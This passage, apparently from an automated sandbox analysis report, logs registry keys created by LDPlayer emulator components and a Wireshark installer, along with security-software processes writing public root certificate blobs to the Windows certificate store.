| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-BE30-49C0-B315-E9749E1BDED1}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-9641-4397-854A-040439D0114B}\ = "IGuestScreenInfo" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-8384-11E9-921D-8B984E28A686}\TypeLib | C:\Program Files\ldplayer9box\Ld9BoxSVC.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-A862-4DC9-8C89-BF4BA74A886A}\TypeLib | C:\Program Files\ldplayer9box\Ld9BoxSVC.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-0B79-4350-BDD9-A0376CD6E6E3}\ = "IExtPackBase" | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-C927-11E7-B788-33C248E71FC7} | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-7556-4CBC-8C04-043096B02D82}\NumMethods | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-E8B8-4838-B10C-45BA193734C1}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-1640-41f9-bd74-3ef5fd653250} | C:\Program Files\ldplayer9box\Ld9BoxSVC.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-5F86-4D65-AD1B-87CA284FB1C8} | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-D545-44AA-8013-181B8C288554} | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-D8ED-44CF-85AC-C83A26C95A4D}\NumMethods | C:\Program Files\ldplayer9box\Ld9BoxSVC.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20191216-c9d2-4f11-a384-53f0cf917214}\InprocServer32 | C:\Program Files\ldplayer9box\Ld9BoxSVC.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.ntar | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-0721-4CDE-867C-1A82ABAF914C}\ProxyStubClsid32\ = "{20191216-1807-4249-5BA5-EA42D66AF0BF}" | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-2F05-4D28-855F-488F96BAD2B2}\NumMethods\ = "14" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ldmnq.apk\DefaultIcon\ = "F:\\LDPlayer\\LDPlayer9\\apk_icon.ico" | F:\LDPlayer\LDPlayer9\LDPlayer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-C196-4D26-B8DB-4C8C389F1F82}\TypeLib\ = "{20191216-1750-46f0-936e-bd127d5bc264}" | C:\Program Files\ldplayer9box\Ld9BoxSVC.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-3188-4C8C-8756-1395E8CB691C}\NumMethods | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-2F1A-4D6C-81FC-E3FA843F49AE}\ = "IFile" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-319C-4E7E-8150-C5837BD265F6} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-2FD3-47E2-A5DC-2C2431D833CC}\ProxyStubClsid32 | C:\Program Files\ldplayer9box\Ld9BoxSVC.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-4737-457B-99FC-BC52C851A44F}\NumMethods | C:\Program Files\ldplayer9box\Ld9BoxSVC.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VirtualBox.VirtualBox.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-C6FA-430E-6020-6A505D086387} | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-04D0-4DB6-8D66-DC2F033120E1}\ = "IAudioAdapterChangedEvent" | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-8F30-401B-A8CD-FE31DBE839C0}\NumMethods\ = "12" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-F4F4-4DD0-9D30-C89B873247EC} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-8ce7-469f-a4c2-6476f581ff72} | C:\Program Files\ldplayer9box\Ld9BoxSVC.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-4737-457B-99FC-BC52C851A44F}\TypeLib | C:\Program Files\ldplayer9box\Ld9BoxSVC.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-1EC6-4883-801D-77F56CFD0103}\ = "INetworkAdapterChangedEvent" | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-F4F4-4DD0-9D30-C89B873247EC}\ = "IGuestMultiTouchEvent" | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-61D9-4940-A084-E6BB29AF3D83}\NumMethods\ = "13" | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-3FF2-4F2E-8F09-07382EE25088}\NumMethods\ = "14" | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-26F1-4EDB-8DD2-6BDDD0912368}\ProxyStubClsid32\ = "{20191216-1807-4249-5BA5-EA42D66AF0BF}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-EBF9-4D5C-7AEA-877BFC4256BA}\ProxyStubClsid32\ = "{20191216-1807-4249-5BA5-EA42D66AF0BF}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ldmnq.apk\DefaultIcon\ = "F:\\LDPlayer\\LDPlayer9\\apk_icon.ico" | F:\LDPlayer\LDPlayer9\LDPlayer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-AC97-4C16-B3E2-81BD8A57CC27}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-929C-40E8-BF16-FEA557CD8E7E}\NumMethods\ = "115" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-0FF7-46B7-A138-3C6E5AC946B4}\ProxyStubClsid32 | C:\Program Files\ldplayer9box\Ld9BoxSVC.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-c8e9-466b-9660-45cb3e9979e4} | C:\Program Files\ldplayer9box\Ld9BoxSVC.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-4289-ef4e-8e6a-e5b07816b631} | C:\Program Files\ldplayer9box\Ld9BoxSVC.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-7966-481D-AB0B-D0ED73E28135}\TypeLib | C:\Program Files\ldplayer9box\Ld9BoxSVC.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-0126-43E0-B05D-326E74ABB356}\NumMethods | C:\Program Files\ldplayer9box\Ld9BoxSVC.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-7BDC-11E9-8BC2-8FFDB8B19219} | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-EE61-462F-AED3-0DFF6CBF9904}\NumMethods\ = "16" | C:\Windows\SYSTEM32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-0721-4CDE-867C-1A82ABAF914C}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 | C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\saBSI.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 040000000100000010000000e94fb54871208c00df70f708ac47085b0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b81900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b4200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 | C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\saBSI.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob = 5c000000010000000400000000080000190000000100000010000000fa46ce7cbb85cfb4310075313a09ee050300000001000000140000008cf427fd790c3ad166068de81e57efbb932272d47e000000010000000800000000c001b39667d6011d0000000100000010000000521b5f4582c1dcaae381b05e37ca2d341400000001000000140000006a72267ad01eef7de73b6951d46c8d9f901266ab0b000000010000001800000045006e00740072007500730074002e006e0065007400000062000000010000002000000043df5774b03e7fef5fe40d931a7bedf1bb2e6b42738c4e6d3841103d3aa7f3397f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b06010505070307530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f0000000100000020000000fde5f2d9ce2026e1e10064c0a468c9f355b90acf85baf5ce6f52d4016837fd940400000001000000100000004be2c99196650cf40e5a9392a00afeb22000000001000000420400003082043e30820326a00302010202044a538c28300d06092a864886f70d01010b05003081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d204732301e170d3039303730373137323535345a170d3330313230373137353535345a3081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100ba84b672db9e0c6be299e93001a776ea32b895411ac9da614e5872cffef68279bf7361060aa527d8b35fd3454e1c72d64e32f2728a0ff78319d06a808000451eb0c7e79abf1257271ca3682f0a87bd6a6b0e5e65f31c77d5d4858d7021b4b332e78ba2d5863902b1b8d247cee4c949c43ba7defb547d57bef0e86ec279b23a0b55e250981632135c2f7856c1c294b3f25ae4279a9f24d7c6ecd09b2582e3ccc2c445c58c977a066b2a119fa90a6e483b6fdbd4111942f78f07bff5535f9c3ef4172ce669ac4e324c6277eab7e8e5bb34bc198bae9c51e7b77eb553b13322e56dcf703c1afae29b67b683f48da5af624c4de058ac64341203f8b68d946324a4710203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604146a72267ad01eef7de73b6951d46c8d9f901266ab300d06092a864886f70d01010b05000382010100799f1d96c6b6793f228d87d3870304606a6b9a2e59897311ac43d1f513ff8d392bc0f2bd4f708ca92fea17c40b549ed41b9698333ca8ad62a20076ab59696e061d7ec4b9448d98af12d461db0a194647f3ebf763c1400540a5d2b7f4b59a36bfa98876880455042b9c877f1a373c7e2da51ad8d4895ecabdac3d6cd86dafd5f3760fcd3b8838229d6c939ac43dbf821b653fa60f5daafce5b215cab5adc6bc3dd084e8ea0672b04d393278bf3e119c0ba49d9a21f3f09b0b3078dbc1dc8743febc639acac5c21cc9c78dff3b125808e6b63dec7a2c4efb8396ce0c3c69875473a473c293ff5110ac155401d8fc05b189a17f74839a49d7dc4e7b8a486f8b45f6 | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob = 0f0000000100000020000000fde5f2d9ce2026e1e10064c0a468c9f355b90acf85baf5ce6f52d4016837fd94090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b0601050507030762000000010000002000000043df5774b03e7fef5fe40d931a7bedf1bb2e6b42738c4e6d3841103d3aa7f3390b000000010000001800000045006e00740072007500730074002e006e006500740000001400000001000000140000006a72267ad01eef7de73b6951d46c8d9f901266ab1d0000000100000010000000521b5f4582c1dcaae381b05e37ca2d347e000000010000000800000000c001b39667d6010300000001000000140000008cf427fd790c3ad166068de81e57efbb932272d42000000001000000420400003082043e30820326a00302010202044a538c28300d06092a864886f70d01010b05003081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d204732301e170d3039303730373137323535345a170d3330313230373137353535345a3081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100ba84b672db9e0c6be299e93001a776ea32b895411ac9da614e5872cffef68279bf7361060aa527d8b35fd3454e1c72d64e32f2728a0ff78319d06a808000451eb0c7e79abf1257271ca3682f0a87bd6a6b0e5e65f31c77d5d4858d7021b4b332e78ba2d5863902b1b8d247cee4c949c43ba7defb547d57bef0e86ec279b23a0b55e250981632135c2f7856c1c294b3f25ae4279a9f24d7c6ecd09b2582e3ccc2c445c58c977a066b2a119fa90a6e483b6fdbd4111942f78f07bff5535f9c3ef4172ce669ac4e324c6277eab7e8e5bb34bc198bae9c51e7b77eb553b13322e56dcf703c1afae29b67b683f48da5af624c4de058ac64341203f8b68d946324a4710203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604146a72267ad01eef7de73b6951d46c8d9f901266ab300d06092a864886f70d01010b05000382010100799f1d96c6b6793f228d87d3870304606a6b9a2e59897311ac43d1f513ff8d392bc0f2bd4f708ca92fea17c40b549ed41b9698333ca8ad62a20076ab59696e061d7ec4b9448d98af12d